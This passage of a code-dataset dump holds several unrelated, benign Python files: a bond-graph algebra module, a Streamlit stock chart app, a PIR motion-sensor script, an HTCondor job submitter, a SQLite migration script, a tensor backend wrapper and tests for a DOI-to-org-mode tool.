coordinates[offset+ss_size+idx]\n dvc = sp.Symbol(f\"d{str(cv)}\")\n try:\n dc_idx = coordinates.index(dvc)\n except ValueError:\n dc_idx = len(coordinates)\n coordinates.append(dvc)\n cv_size += 1\n n += 1\n linear_op = linear_op.row_join(\n sp.SparseMatrix(linear_op.rows, 1, {})\n )\n eqn = coeff/factor\n if eqn.is_number:\n lin_dict.update({(0, dc_idx): eqn})\n else:\n nlin += eqn*dvc\n linear_op = linear_op.col_join(\n sp.SparseMatrix(1,linear_op.cols, lin_dict)\n )\n nonlinear_op = nonlinear_op.col_join(\n sp.SparseMatrix(1,1,{(0,0):nlin})\n )\n\n linear_op, nonlinear_op, new_constraints = smith_normal_form(\n matrix=linear_op,\n augment=nonlinear_op)\n\n return linear_op, nonlinear_op, new_constraints + initial_constraints, \\\n coordinates, (ss_size, js_size, cv_size, n)\n\n\ndef create_ds(coords, mapping, linear, nonlinear, constraints):\n\n ss_size = len(mapping[0])\n js_size = len(mapping[1])\n\n ##\n # We'd hope that the Linear Operator is in block form\n #\n # L = [[A_1 B_1 C_1],\n # [0 B_2 C_2],\n #\n # X = [[dx, l, x]]\n #\n # So that L.dot(X) + F(X,t) = 0\n #\n\n A_1 = linear[0:ss_size, 0:ss_size]\n B_1 = linear[0:ss_size, ss_size: 2*js_size + ss_size]\n C_1 = linear[0:ss_size, 2*js_size + ss_size:2*(js_size + ss_size)]\n D_1 = linear[0:ss_size, 2*(js_size + ss_size):]\n F_1 = nonlinear[0:ss_size,:]\n\n B_2 = linear[ss_size: 2*js_size + ss_size, ss_size: 2*js_size + ss_size]\n C_2 = linear[ss_size: 2 * js_size + ss_size,\n 2 * js_size + ss_size:2 * (js_size + ss_size)]\n D_2 = linear[ss_size: 2 * js_size + ss_size, 2 * (js_size + ss_size):]\n F_2 = nonlinear[ss_size: 2 * js_size + ss_size, :]\n\n assert (B_2 - sp.eye(B_2.rows)).is_zero\n assert (A_1 - sp.eye(A_1.rows)).is_zero\n\n ds = (\n np.array(A_1).astype(np.float64),\n np.array(C_1).astype(np.float64),\n np.array(D_1).astype(np.float64)\n )\n\n def port_func(x,t):\n\n pass\n\n\n # dX = -C_1*X + -D_1*U - F_1(X)\n # J = -C_2*X - -D_2*U - F_2(X)\n #\n # x=(y,z) s.t. 
[dy,dz] = [0, f(y,z,u)]\n # set x = [[ M_1^T ] (y\n # [ M_2^T ]] z)\n #\n\n\ndef _generate_cv_substitutions(subs_pairs, mappins, coords):\n state_map, port_map, control_map = mappins\n ss_size = len(state_map)\n\n cv_offset = 2*(ss_size + len(port_map))\n\n control_vars = {str(c) for c in coords[cv_offset:]}\n print(control_vars)\n subs = []\n for var, fx_str in subs_pairs.items():\n\n if var in control_vars:\n u = sp.S(var)\n elif var in control_map:\n u = sp.S(f\"u_{control_map[var]}\")\n else:\n raise SymbolicException(\"Could not substitute control variable %s\",\n str(var))\n fx = sp.sympify(fx_str)\n\n subs.append((u, fx))\n\n return subs\n\n\ndef reduce_model(linear_op, nonlinear_op, coordinates, size_tuple,\n control_vars=None):\n \"\"\"\n Args:\n linear_op: Linear part of the constitutive relations.\n nonlinear_op: The corresponding nonlinear part; a symbolic vector with\n the same number of rows.\n coordinates: a list of all the relevant co-ordinates\n size_tuple:\n\n Returns:\n\n\n Todo:\n refactor so as to remove size_tuple;\n the co-ordinates should arrive partitioned!\n \"\"\"\n #\n linear_op, nonlinear_op, constraints = smith_normal_form(\n matrix=linear_op,\n augment=nonlinear_op)\n\n rows_added = 0\n added_cvs = []\n cv_diff_dict = {}\n lin_dict = {}\n nlin_dict = {}\n\n logger.info(\"Handling algebraic constraints\")\n\n ###\n # First; take care of control variables\n #\n\n #\n # Then substitute as much of the junction space as possible.\n #\n\n subs_list = _generate_substitutions(\n linear_op, nonlinear_op, constraints, coordinates, size_tuple\n )\n logger.info(\"Applying substitutions\")\n\n nonlinear_op = nonlinear_op.subs(subs_list)\n constraints = [c.subs(subs_list) for c in constraints]\n\n logger.info(\"Reducing purely algebraic constraints\")\n # second, reduce the order of all nonlinear constraints\n linear_op, nonlinear_op, constraints, coordinates, size_tuple =\\\n _process_constraints(linear_op, nonlinear_op,\n constraints, coordinates, size_tuple)\n logger.info(\"Applying substitutions, round 2\")\n subs_list = _generate_substitutions(\n linear_op, nonlinear_op, constraints, coordinates, size_tuple\n )\n nonlinear_op = nonlinear_op.subs(subs_list)\n constraints = [c.subs(subs_list) for c in constraints]\n ##\n # Split the constraints into:\n # - Linear constraints; ie Lx = 0\n # - Nonlinear Constraints Lx + F(x) = 0\n #\n # Linear constraints are rows with more than 1 non-zero\n # that are not in the derivative subspace, and have a zero nonlinear part\n #\n # ## New Code\n ss_size, js_size, cv_size, n = size_tuple\n offset = 2 * js_size + ss_size\n for row in reversed(range(linear_op.rows, offset)):\n atoms = nonlinear_op[row].atoms()\n if not atoms & set(coordinates) and linear_op[row].nnz() > 1:\n logger.info(\"Linear constraint in row %s\", repr(row))\n for idx in range(ss_size):\n v = linear_op[row, idx + offset]\n if v:\n lin_dict.update({(rows_added,idx): v})\n for idx in range(cv_size):\n v = linear_op[row, idx + offset+ss_size]\n if v:\n cv_diff_dict.update({(rows_added, idx): v})\n\n for row in range(offset, linear_op.rows):\n logger.info(\"Testing row %s: %s + %s\", repr(row),\n repr(linear_op[row, :].dot(coordinates)),\n repr(nonlinear_op[row]) if nonlinear_op else '')\n\n nonlinear_constraint = nonlinear_op[row]\n F_args = set(coordinates[0:offset + ss_size]) & \\\n nonlinear_constraint.atoms()\n if linear_op[row, offset:-1].is_zero and not nonlinear_constraint:\n continue\n\n state_constraint = linear_op[row, offset: offset + ss_size]\n 
control_constraint = linear_op[row, offset + ss_size:]\n\n row = state_constraint.row_join(sp.SparseMatrix(1, offset + cv_size, {}))\n\n cv_dict = {}\n if not control_constraint.is_zero:\n logging.info(\"Found higher order control constraint\")\n for cv_col in range(control_constraint.cols):\n const = control_constraint[cv_col]\n if not const:\n continue\n\n try:\n idx = added_cvs.index(cv_col)\n except ValueError:\n idx = len(added_cvs)\n added_cvs.append(cv_col)\n linear_op= linear_op.row_join(sp.SparseMatrix(linear_op.rows, 1, {}))\n coord = coordinates[offset + ss_size + cv_col]\n d_coord = sp.Symbol(f\"d{str(coord)}\")\n coordinates.append(d_coord)\n cv_size += 1\n n += 1\n\n cv_dict[(0,idx)] = const\n\n row = row.row_join(sp.SparseMatrix(1, len(added_cvs), cv_dict))\n jac_dx = [nonlinear_constraint.diff(c) for c in coordinates[:ss_size]]\n jac_junciton = [\n nonlinear_constraint.diff(c)\n for c in coordinates[ss_size:offset]\n ]\n jac_x = [\n nonlinear_constraint.diff(c)\n for c in coordinates[offset:\n offset+ss_size]\n ]\n jac_cv = [\n nonlinear_constraint.diff(c)\n for c in coordinates[offset + ss_size:]\n ]\n\n nlin_row = sp.S(0)\n\n if any(x!=0 for x in jac_dx):\n logger.warning(\"Second order constriants not implemented: %s\",\n jac_dx)\n elif any(x!=0 for x in jac_junciton):\n logger.warning(\"First order junciton constriants not implemented: %s\",\n jac_cv)\n elif any(x!=0 for x in jac_cv):\n logger.warning(\"First order control constriants not implemented: %s\",\n jac_cv)\n elif any(x!=0 for x in jac_x):\n logger.info(\"First order constriants: %s\", jac_x)\n fx = sum(x*y for x,y in zip(jac_x, coordinates[:ss_size]))\n logger.info(repr(fx))\n p, q = sp.fraction(sp.simplify(fx))\n if row.is_zero:\n lin_dict, nlin = extract_coefficients(\n p, {c:i for i,c in enumerate(coordinates)},\n coordinates)\n\n for k, v in lin_dict.items():\n row[0, k] += v\n\n nlin_row += nlin\n\n else:\n nlin_row += fx\n\n nonlinear_op = nonlinear_op.col_join(sp.SparseMatrix(1,1,[nlin_row]))\n\n linear_op = linear_op.col_join(row)\n rows_added += 1\n\n if rows_added:\n linear_op, nonlinear_op, constraints = \\\n smith_normal_form(linear_op, nonlinear_op)\n\n return coordinates, linear_op, nonlinear_op, constraints\n\n\ndef flatten(sequence):\n for item in sequence:\n if isinstance(item, (list, tuple)):\n for subitem in flatten(item):\n yield subitem\n else:\n yield item\n\n\ndef augmented_rref(matrix, augment=0):\n\n pivot = 0\n m = matrix.cols - augment\n for col in range(m):\n if matrix[pivot, col] == 0:\n j = None\n v_max = 0\n for row in range(pivot, matrix.rows):\n val = matrix[row, col]\n v = abs(val)\n if v > v_max:\n j = row\n v_max = v\n if not j:\n continue # all zeros below, skip on to next column\n else:\n matrix.row_swap(pivot, j)\n\n a = matrix[pivot, col]\n\n for i in range(matrix.rows):\n if i != pivot and matrix[i, col] != 0:\n b = matrix[i, col]/a\n matrix[i, :] += - b * matrix[pivot, :]\n\n matrix[pivot, :] *= 1 / a\n\n pivot += 1\n\n if pivot >= matrix.rows:\n break\n return matrix\n\n\ndef smith_normal_form(matrix, augment=None):\n \"\"\"\n Assume n >= m\n Args:\n matrix:\n augment:\n\n Returns:\n n x n smith normal form of the matrix.\n Particularly for projection onto the nullspace of M and the orthogonal\n complement\n that is, for a matrix M,\n P = _smith_normal_form(M) is a projection operator onto the nullspace of M\n \"\"\"\n # M, _ = matrix.rref()\n # m, n = M.shape\n # M = sp.SparseMatrix(m, n, M)\n # m_dict = {}\n # current_row = 0\n #\n # row_map = {}\n #\n # 
current_row = 0\n #\n # for row, c_idx, entry in M.RL:\n # if row not in row_map:\n # row_map[row] = c_idx\n # r_idx = c_idx\n #\n # else:\n # r_idx = row_map[row]\n #\n # m_dict[(r_idx, c_idx)] = entry\n #\n # return sp.SparseMatrix(n, n, m_dict)\n\n if augment:\n M = matrix.row_join(augment)\n k = augment.cols\n else:\n M = matrix\n k = 0\n m, n = M.shape\n M = augmented_rref(M, k)\n\n Mp = sp.MutableSparseMatrix(n-k, n, {})\n\n constraints = []\n for row in range(m):\n leading_coeff = -1\n for col in range(row, n-k):\n if M[row, col] != 0:\n leading_coeff = col\n break\n if leading_coeff < 0:\n if not M[row, n-k:].is_zero:\n constraints.append(sum(M[row,:]))\n else:\n Mp[leading_coeff, :] = M[row, :]\n\n if augment:\n return Mp[:,:-k], Mp[:, -k:], constraints\n else:\n return Mp, sp.SparseMatrix(m,k,{}), constraints\n\n\ndef adjacency_to_dict(nodes, edges, offset=0):\n \"\"\"\n matrix has 2*#bonds rows\n and 2*#ports columes\n so that MX = 0 and X^T = (e_1,f_1,e_2,f_2)\n\n Args:\n index_map: the mapping between (component, port) pair and index\n\n Returns: Matrix M\n\n \"\"\"\n M = dict()\n\n for i, (node_1, node_2) in enumerate(edges):\n j_1 = offset + 2 * nodes[node_1]\n j_2 = offset + 2 * nodes[node_2]\n # effort variables\n M[(2 * i, j_1)] = - 1\n M[(2 * i, j_2)] = 1\n # flow variables\n M[(2 * i + 1, j_1 + 1)] = 1\n M[(2 * i + 1, j_2 + 1)] = 1\n\n return M\n\n\ndef inverse_coord_maps(tangent_space, port_space, control_space):\n inverse_tm = {\n coord_id: index for index, coord_id\n in enumerate(tangent_space.values())\n }\n inverse_js = {\n coord_id: index for index, coord_id\n in enumerate(port_space.values())\n }\n inverse_cm = {\n coord_id: index for index, coord_id\n in enumerate(control_space.values())\n }\n\n coordinates = [dx for _, dx in tangent_space]\n\n for e, f in port_space:\n coordinates += [e, f]\n for x, _ in tangent_space:\n coordinates.append(x)\n for u in control_space:\n coordinates.append(u)\n\n return (inverse_tm, inverse_js, inverse_cm), coordinates\n","sub_path":"BondGraphTools/algebra.py","file_name":"algebra.py","file_ext":"py","file_size_in_byte":19312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"450621920","text":"import yfinance as yf\r\nimport streamlit as st\r\n\r\nfrom yahoo_fin import stock_info\r\n\r\n\r\n\r\n\r\nst.sidebar.header(\"User input bar\")\r\n\r\ntickerSymbol = st.sidebar.selectbox(\r\n \"Which Ticker would you like to see?\",\r\n stock_info.tickers_sp500())\r\n\r\n\r\nst.write(\r\n \"# Simple Stock Price App\\n\"\r\n f\"Shown are the stock closing price and volume of {tickerSymbol}\"\r\n )\r\n\r\n# https://towardsdatascience.com/how-to-get-stock-data-using-python-c0de1df17e75\r\n#get data on this ticker\r\ntickerData = yf.Ticker(tickerSymbol)\r\n#get the historical prices for this ticker\r\ntickerDf = tickerData.history(period='1d', start='2010-5-31', end='2020-5-31')\r\n# Open\tHigh\tLow\tClose\tVolume\tDividends\tStock Splits\r\n\r\nst.write(\"\"\"\r\n## Closing Price\r\n\"\"\")\r\n\r\nst.line_chart(tickerDf.Close)\r\n\r\nst.write(\"\"\"\r\n## Closing Volume\r\n\"\"\")\r\nst.line_chart(tickerDf.Volume)\r\n","sub_path":"sl1.py","file_name":"sl1.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"32796234","text":"#!usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : Yeph Jia\n\n\nclass Welcome:\n\n def __init__(self):\n print(\"Hello, Commander.\\n\")\n\n\nif __name__ == '__main__':\n welcome = Welcome()\n while True:\n cmd = input(\"waiting for your command...\\n\")\n\n\n","sub_path":"welcome.py","file_name":"welcome.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"19192755","text":"import RPi.GPIO as GPIO\nimport time\n\nGPIO.setmode(GPIO.BCM)\nSENSOR_PIR_PIN = 23\nGPIO.setup(SENSOR_PIR_PIN, GPIO.IN)\n\ndef callback_func(output):\n if output == 1:\n print('Motion Detected!!')\n # else output == 0:\n # print(\"Motion Not Detected!!\")\n\ntry:\n print(\"PIR Module Test (CTRL+C to exit)\")\n time.sleep(2)\n print(\"Ready\")\n while True:\n time.sleep(5)\n output = GPIO.input(SENSOR_PIR_PIN)\n callback_func(output)\nexcept KeyboardInterrupt:\n print(\"Quit\")\n GPIO.cleanup()","sub_path":"Motion_Detection_HC_SR501_PIR_Sensor.py","file_name":"Motion_Detection_HC_SR501_PIR_Sensor.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"271842483","text":"#!/bin/python\n\nimport subprocess\n\nMagDownJob =627\nMagUpJob = 628\nMagDownSJN=1638\nMagUpSJN=517\n\nJobs={ 627: 1638,\n 628: 517\n }\n\ncondor_script=open('condor_submission.sub','w')\ncondor_script.write(\n'Executable = /home/tw/Analysis2/buketap/EPFLDataProcessing/brun.sh \\nError = logs/run$(process).err \\nOutput = logs/run$(process).out \\nLog = logs/run$(process).log \\nshould_transfer_files = YES \\nwhen_to_transfer_output = ON_EXIT \\n')\n\n\nfor job,Nsjs in Jobs.iteritems():\n for i in range(0,Nsjs):\n condor_script.write('arguments = {j} {sj}\\n'.format(j=job,sj=i))\n condor_script.write('Queue \\n')\ncondor_script.close()\n\nsubprocess.call('condor_submit condor_submission.sub',shell=True)\n","sub_path":"buketap/EPFLDataProcessing/SubmitToBatch.py","file_name":"SubmitToBatch.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"188906168","text":"import sqlite3\nfrom openpyxl import load_workbook\n\ndef migrate_data():\n wb = load_workbook(\"player data.xlsx\")\n\n migrate_endings(wb)\n migrate_annie(wb)\n migrate_global(wb)\n\n print('Data migrated to SQLite!')\n\n\ndef migrate_endings(wb):\n endings_data = wb['Endings']\n\n conn = sqlite3.connect('cya_db.db')\n cursor = conn.cursor()\n\n endings_index_map = {'Joining the Garrison':0, 'An Ordinary Moment of Happiness':1, 'Jean Kirstein of the Survey Corps':2, 'A Narrow Victory':3, 'Armin Arlert\\'s Dream':4,\n 'Captain Levi\\'s Recruit':5, 'Mikasa\\'s True Face':6, 'Nameless Hero':7, 'Eren Yeager\\'s Hand':8, 'Sasha Blouse\\'s Promise':9, 'The Girl Who Hid Her True Self':10,\n 'No Regrets':11, 'Jean of the Military Police':12, 'Trial of Eren and Mikasa':13, 'A Soldier\\'s Duty':14, 'Failure of the Reclamation Plan':15, 'A Regular Soldier':16,\n '104th Annihilated at HQ':17, 'The Fall of Wall Rose':18, 'Failure to Reclaim Trost District':19, 'A Moment\\'s Peace':20, 'Eren Flees':21, 'The Death of a Merchant':22,\n 'Junior High':23}\n\n endings_db_map = {'Joining the Garrison':'joining_the_garrison', 'An Ordinary Moment of Happiness':'an_ordinary_moment_of_happiness', \n 'Jean Kirstein of the Survey Corps':'jean_kirstein_of_the_survey_corps', 'A Narrow Victory':'a_narrow_victory', 'Armin Arlert\\'s Dream':'armin_arlerts_dream',\n 'Captain Levi\\'s Recruit':'captain_levis_recruit', 'Mikasa\\'s True Face':'mikasas_true_face', 'Nameless Hero':'nameless_hero', 'Eren Yeager\\'s Hand':'eren_yeagers_hand', \n 'Sasha Blouse\\'s Promise':'sasha_blouses_promise', 'The Girl Who Hid Her True Self':'the_girl_who_hid_her_true_self', 'No Regrets':'no_regrets', \n 'Jean of the Military Police':'jean_of_the_military_police', 'Trial of Eren and Mikasa':'trial_of_eren_and_mikasa', 'A Soldier\\'s Duty':'a_soldiers_duty', \n 'Failure of the Reclamation Plan':'failure_of_the_reclamation_plan', 'A Regular Soldier':'a_regular_soldier','104th Annihilated at HQ':'annihilated_at_hq', \n 'The Fall of Wall Rose':'the_fall_of_wall_rose', 'Failure to Reclaim Trost District':'failure_to_reclaim_trost_district', 'A Moment\\'s Peace':'a_moments_peace', \n 'Eren Flees':'eren_flees', 'The Death of a Merchant':'the_death_of_a_merchant','Junior High':'junior_high'}\n\n i = 0\n for _ in endings_data:\n i += 1\n\n row_values = [\n endings_data['A' + str(i)].value,\n endings_data['B' + str(i)].value,\n ]\n check_row = 'SELECT * FROM endings WHERE player = ?'\n cursor.execute(check_row, (row_values[0],))\n data = cursor.fetchone()\n\n if data is None:\n insert_row = 'INSERT INTO endings VALUES ({})'.format(','.join('?' * 25))\n insert_position = endings_index_map[row_values[1]]\n insert_data = [row_values[0]] + [0] * insert_position + [1] + [0] * (25 - 2 - insert_position)\n cursor.execute(insert_row, insert_data)\n else:\n update_row = 'UPDATE endings SET {} = ? 
WHERE player = ?'.format(endings_db_map[row_values[1]])\n ending_index = 1 + endings_index_map[row_values[1]]\n update_data = [data[ending_index] + 1, data[0]]\n cursor.execute(update_row, update_data)\n \n conn.commit()\n conn.close()\n\ndef migrate_annie(wb):\n annie_data = wb['Annie progress']\n\n conn = sqlite3.connect('cya_db.db')\n cursor = conn.cursor()\n\n annie_map = {'two':1, 'three':2, 'four':3, 'five':4, 'victory':5}\n\n i = 0\n for _ in annie_data:\n i += 1\n\n row_values = [\n annie_data['A' + str(i)].value,\n annie_data['B' + str(i)].value,\n ]\n check_row = 'SELECT * FROM annie_progress WHERE player = ?'\n cursor.execute(check_row, (row_values[0],))\n data = cursor.fetchone()\n\n if data is None:\n insert_row = 'INSERT INTO annie_progress VALUES (?,?)'\n insert_data = [row_values[0], annie_map[row_values[1]]]\n cursor.execute(insert_row, insert_data)\n else:\n update_row = 'UPDATE annie_progress SET progress = ? WHERE player = ?'\n highest_progress = max(data[1], annie_map[row_values[1]])\n update_data = [highest_progress, data[0]]\n cursor.execute(update_row, update_data)\n\n conn.commit()\n conn.close()\n\ndef migrate_global(wb):\n global_data = wb['Global']\n\n conn = sqlite3.connect('cya_db.db')\n cursor = conn.cursor()\n\n i = 0\n for _ in global_data:\n i += 1\n\n row_values = [\n global_data['A' + str(i)].value,\n global_data['B' + str(i)].value,\n ]\n\n insert_row = 'INSERT INTO global VALUES (?,?)'\n insert_data = [row_values[0], row_values[1]]\n cursor.execute(insert_row, insert_data)\n\n conn.commit()\n conn.close()\n\nmigrate_data()","sub_path":"Archive/ChooseYourAdventure/migrate_cya.py","file_name":"migrate_cya.py","file_ext":"py","file_size_in_byte":4844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"237429765","text":"from __future__ import absolute_import\nfrom functools import wraps\nfrom symtensor.sym import (array, einsum, zeros, get_full_shape, \\\n zeros_like, diag, tensor, __all__)\nfrom . import random\nimport numpy\n\n__all__.extend([\"random\", \"fromfunction\", \"frombatchfunc\"])\ndef backend_wrapper(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n kwargs['backend'] = 'numpy'\n return func(*args, **kwargs)\n return wrapper\n\nzeros = backend_wrapper(zeros)\ndiag = backend_wrapper(diag)\narray = backend_wrapper(array)\ntensor = backend_wrapper(tensor)\n\ndef fromfunction(func, shape, **kwargs):\n sym = kwargs.pop('sym', None)\n dtype = kwargs.get('dtype', float)\n out = zeros(shape, sym)\n nsym = out.nsym\n if out.nsym==0:\n out.array = numpy.fromfunction(func, shape, **kwargs)\n else:\n kwargs.pop('dtype', None)\n sym_shape = list(out.array.shape[:nsym-1])\n ntasks = numpy.prod(sym_shape)\n trunk_size = numpy.prod(shape)\n for i in range(ntasks):\n idx = numpy.unravel_index(i, sym_shape)\n trunk_data = func(*idx, **kwargs)\n trunk_idx = i * trunk_size + numpy.arange(trunk_size)\n out.put(trunk_idx, trunk_data.ravel())\n return out\n\ndef frombatchfunc(func, shape, all_tasks, **kwargs):\n nout = kwargs.pop(\"nout\", 1)\n sym = kwargs.pop(\"sym\", None)\n dtype = kwargs.pop(\"dtype\", float)\n if isinstance(shape[0], list) or isinstance(shape[0], tuple):\n shape_list = shape\n else:\n shape_list = [shape,] * nout\n\n if sym is None:\n sym_list = [sym,]*nout\n elif isinstance(sym[0], str):\n sym_list = [sym,]*nout\n else:\n sym_list = sym\n\n out = kwargs.pop('out', None)\n\n if out is None:\n if nout==1:\n out = zeros(shape, sym, dtype=dtype)\n else:\n out = [zeros(shape_list[i], sym_list[i], dtype=dtype) for i in range(nout)]\n else:\n if isinstance(out, (list, tuple)):\n nout = len(out)\n else:\n nout = 1\n\n for itask in all_tasks:\n\n if isinstance(itask, (tuple, list)):\n inds, vals = func(*itask, **kwargs)\n else:\n inds, vals = func(itask, **kwargs)\n \n if nout ==1:\n out.put(inds.ravel(), vals.ravel())\n else:\n for i in range(nout):\n out[i].put(inds[i].ravel(), vals[i].ravel())\n inds = vals = None\n\n return out\n","sub_path":"symtensor/numpy/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"292318188","text":"#! /usr/bin/env python3\n\nimport unittest\nimport random\nimport functools\nimport os\nimport sys\nimport yaml\nimport filecmp\nimport shutil\nfrom subprocess import Popen, PIPE\nfrom doi_to_org import *\n\nclass Util(unittest.TestCase):\n def run_prog(self, *args):\n cmd = ['./doi_to_org.py', *args]\n process = Popen(cmd, stdout=PIPE, stderr=PIPE)\n output = process.communicate()\n if process.wait() != 0:\n sys.stderr.write('with command: %s\\nstdout: %s\\nstderr: %s\\n' % (' '.join(args), output[0].decode('utf8'), output[1].decode('utf8')))\n self.assertTrue(False)\n with open(self.orgfile) as f:\n return f.read()\n\n def create_config(self):\n self.orgfile = os.path.join(os.getcwd(), 'foo.org')\n with open(self.orgfile, 'w') as f:\n f.write('')\n with open(CONFIG_FILE, 'w') as f:\n yaml.dump({CONFIG_ORGFILE_KEY : self.orgfile}, f)\n\n def tearDown(self):\n os.remove(CONFIG_FILE)\n os.remove(self.orgfile)\n\n def setUp(self):\n self.maxDiff = None\n self.create_config()\n\n def generic_test(self, arg, expected_output_file):\n with open(expected_output_file) as f:\n expected_output = f.read().strip()\n output = self.run_prog(arg).strip()\n self.assertEqual(output, expected_output)\n\nclass BibEntryTest(unittest.TestCase):\n def test_basic(self):\n with open('test_data/casanova_input.bib') as f:\n bibtex = f.read()\n bib_list = BibEntry.from_bibtex(bibtex)\n self.assertEqual(len(bib_list), 1)\n bib = bib_list[0]\n self.assertEqual(bib.doi, '10.1016/j.jpdc.2014.06.008')\n self.assertEqual(bib.url, 'https://hal.inria.fr/hal-01017319')\n self.assertEqual(bib.pdf, 'https://hal.inria.fr/hal-01017319/file/simgrid3-journal.pdf')\n self.assertEqual(bib.title, 'Versatile, Scalable, and Accurate Simulation of Distributed Applications and Platforms')\n import warnings\n with warnings.catch_warnings(): # calling the method plaintext() from pybtex causes a depreciation warning, but the proposed altednative does not work\n warnings.filterwarnings(\"ignore\", category=DeprecationWarning)\n self.assertEqual(bib.authors, 'Henri Casanova, Arnaud Giersch, Arnaud Legrand, Martin Quinson, Frédéric Suter')\n\n def test_missing_author(self):\n with open('test_data/casanova_missing_author_input.bib') as f:\n bibtex = f.read()\n\n bib_list = BibEntry.from_bibtex(bibtex)\n org_entry = OrgEntry(\"\", bib_list[0], attachment = True)\n\n with self.assertRaises(SystemExit):\n org_entry.orgmode_from_bibentry()\n\nclass BasicCommandLineTest(Util):\n def test_doi(self):\n self.generic_test('10.1137/0206024', 'test_data/knuth_output.org')\n\n def test_bibtex(self):\n self.generic_test('test_data/knuth_input.bib', 'test_data/knuth_output.org')\n\n def test_fixpoint(self):\n first_output = self.run_prog('test_data/knuth_input.bib')\n splitted = first_output.split('\\n')\n bibtex = []\n in_src = False\n for line in splitted:\n if in_src:\n if line.startswith('#+END_SRC'):\n break\n else:\n bibtex.append(line)\n else:\n if line.startswith('#+BEGIN_SRC'):\n in_src = True\n bibtex = '\\n'.join(bibtex)\n with open('/tmp/test_doi.bib', 'w') as f:\n f.write(bibtex)\n with open(self.orgfile, 'w') as f: # clearing the file...\n f.write('')\n second_output = self.run_prog('/tmp/test_doi.bib')\n self.assertEqual(first_output, second_output)\n\nclass ConfigTest(unittest.TestCase):\n def setUp(self):\n self.orgfile = os.path.join(os.getcwd(), 'foo.org')\n with open(self.orgfile, 'w') as f:\n f.write('hello world!')\n\n def tearDown(self):\n os.remove(CONFIG_FILE)\n os.remove(self.orgfile)\n\n def 
test_find_file(self):\n with self.assertRaises(FileNotFoundError):\n find_config_file()\n with open(CONFIG_FILE, 'w') as f:\n f.write('hello: world\\n')\n expected = os.path.join(os.getcwd(), CONFIG_FILE)\n self.assertEqual(expected, find_config_file())\n\n def create_config_file(self, config):\n with open(CONFIG_FILE, 'w') as f:\n yaml.dump(config, f)\n\n def test_get_correct_config(self):\n config = {CONFIG_ORGFILE_KEY: self.orgfile}\n self.create_config_file(config)\n real_config = get_config()\n self.assertEqual(config, real_config)\n\n def test_get_config_wrongfile(self):\n config = {CONFIG_ORGFILE_KEY: self.orgfile + 'some_other_str'}\n self.create_config_file(config)\n with self.assertRaises(ConfigError):\n get_config()\n\n def test_get_config_wrongkey(self):\n config = {'foo' : self.orgfile}\n self.create_config_file(config)\n with self.assertRaises(ConfigError):\n get_config()\n\nclass AttachmentTest(Util):\n def tearDown(self):\n shutil.rmtree('data')\n if os.path.isfile(self.orgfile):\n os.remove(self.orgfile)\n\n def generic_test(self, args, file_hash, file_name, expected_output_file):\n with open(expected_output_file) as f:\n expected_output = f.read().strip()\n output = self.run_prog('%s' % (','.join(args))).strip()\n self.assertEqual(output, expected_output)\n file_path = os.path.join('data', file_hash[:2], file_hash[2:], file_name)\n self.assertTrue(os.path.isfile(file_path))\n self.assertEqual(Attachment.crypto_hash(file_path), file_hash)\n\n def test_basic_attachment(self): # attaching knuth_input.bib\n self.generic_test(args=['test_data/knuth_input.bib', 'test_data/knuth_input.bib'],\n file_hash = '37f3616032c0bd00516ce65ff1c0c01ed25f99e5573731d660a4b38539b02346bcf794024c8d4c21e0bed97f50a309c40172ba342870e1526b370a03c55dbf49',\n file_name = 'Fast_Pattern_Matching_in_Strings.txt',\n expected_output_file='test_data/knuth_output_attachment.org')\n\n def test_url(self):\n self.generic_test(args=['https://hal.inria.fr/hal-01017319v2/bibtex'],\n file_hash = '095c324c84cc92722b52a2e87b63c638d052ea30397646bc4462ee84bca46412c574f89d636d1841d54eae2df7d33a545e97e204ed0147a84c1d89b7deb8081e',\n file_name = 'Versatile,_Scalable,_and_Accurate_Simulation_of_Distributed_Applications_and_Platforms.pdf',\n expected_output_file = 'test_data/casanova_output.org')\n\n def test_hal(self):\n self.generic_test(args=['hal-01017319v2'],\n file_hash = '095c324c84cc92722b52a2e87b63c638d052ea30397646bc4462ee84bca46412c574f89d636d1841d54eae2df7d33a545e97e204ed0147a84c1d89b7deb8081e',\n file_name = 'Versatile,_Scalable,_and_Accurate_Simulation_of_Distributed_Applications_and_Platforms.pdf',\n expected_output_file = 'test_data/casanova_output.org')\n\n def test_pdfpath(self):\n with open('test_data/casanova_local_pdf_input.bib') as f:\n bibtex = f.read()\n\n pdfpath = 'test_data/pdf'\n orgfile = os.path.join(os.getcwd(), 'bar.org')\n\n bib_list = BibEntry.from_bibtex(bibtex)\n org_entry = OrgEntry(orgfile, bib_list[0], Attachment.from_key(pdfpath, bib_list[0].key))\n\n org_entry.add_entry()\n self.assertTrue(os.path.isfile(\"./data/2a\" +\n \"/b880f480c6e2ef27a84f8e0fd36252ff444f970fe9dec88da2f77c744b85bd\" +\n \"e4b5cfcf5fdea3286298945facd819af9a07e594f4850410ce7e909ac9c31e84/\" +\n \"Versatile,_Scalable,_and_Accurate_Simulation_of_Distributed_\" +\n \"Applications_and_Platforms.pdf\"))\n\n os.remove(orgfile)\n\n def test_missing_file_pdfpath(self):\n with open('test_data/knuth_input.bib') as f:\n bibtex = f.read()\n\n os.mkdir('data')\n\n pdfpath = 'test_data'\n orgfile = os.path.join(os.getcwd(), 
